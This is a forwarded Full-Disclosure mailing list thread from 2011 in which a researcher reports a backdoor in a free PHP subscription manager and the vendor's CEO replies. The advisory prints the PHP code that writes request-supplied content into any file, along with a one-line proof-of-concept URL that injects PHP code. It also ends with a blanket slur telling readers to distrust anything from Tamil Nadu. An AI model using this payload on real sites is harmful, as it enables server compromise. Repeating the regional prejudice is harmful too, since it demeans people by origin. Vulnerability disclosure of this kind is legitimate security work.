Reply received from vendor.
---------- Forwarded message ---------- From: Ganesan (CEO, EPractize Labs Software) <gane...@epractizelabs.com> Date: Tue, Dec 6, 2011 at 10:25 AM Subject: RE: Backdoor in EPractize Labs Online Subscription Manager from epractizelabs.com To: Jan van Niekerk <jvn...@gmail.com> Hi, The PHP is used for tracking open email report in Email Marketing Software Express. It will not be called in any of your free subscription manager PHPs. I do not understand what you mean by don't trust obfuscated software from Tamil Nadu. Do you think all products from Tamil Nadu is unsafe/spam? Thanks Ganesan -----Original Message----- From: "Jan van Niekerk" <jvn...@gmail.com> Sent: Tuesday, December 6, 2011 2:46am To: "full-disclosure" <full-disclosure@lists.grok.org.uk> Cc: gane...@epractizelabs.com Subject: Backdoor in EPractize Labs Online Subscription Manager from epractizelabs.com Vulnerability: back door in stupid spamming software About EPractize Labs: EPractize Labs is fully Customer Focused, Innovative and Global service provider for Skill Development and Skill Evaluation products suitable for pre employment assessment testing, employee evaluation for appraisal, employment screening, employee training, etc. About this software: http://www.epractizelabs.com/email-marketing/subscription-manager.html http://www.epractizelabs.com/email-marketing/Subscribe.zip EPractize Labs Online Subscription Manager Free PHP Online Subscription Manager Easy-to-use Subscription management that eases up your subscription management. With Subscription Manager you can create subscription forms, maintain subscription messages, send confirmation message automatically, configure the subscription forms, load subscribers list, View reports, integrate with Email Marketing Software to manage contact list and campaign management. . showImg.php passes through img.jpg, but also runs the following code as a trivial arbitrary file write back door. It has nothing to do with showing an image. <?php $reqOut="".$_GET['email']; $reqDB="".$_GET['db']; $in_fileStr = file_get_contents_me($reqDB); $count =substr_count($in_fileStr,$reqOut); if($count==0){ $finalStr="".$in_fileStr."\n".$reqOut."#".$today = date("F j, Y, g:i a"); $fT = @fopen($reqDB, 'wt'); fwrite($fT, $finalStr); fclose($fT); } ?> POC: showImg.php?db=me.php&email=<?echo "hello"; ?> Mitigation: Nobody seems to be using this junk. Vendor status: cc with this mail. What were you thinking? Administrative Contact: EPractize Labs Software Private Limited Ganesan (gane...@epractizelabs.com) 108, II Floor, Sundarar Street, Thiruvalleswarar Nagar Anna Nagar West Chennai Tamil Nadu,600040 IN Tel. +91.4465914739 Moral of the story: don't trust obfuscated software from Tamil Nadu province. Actually, just don't trust obfuscated software, and don't trust anything from Tamil Nadu. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
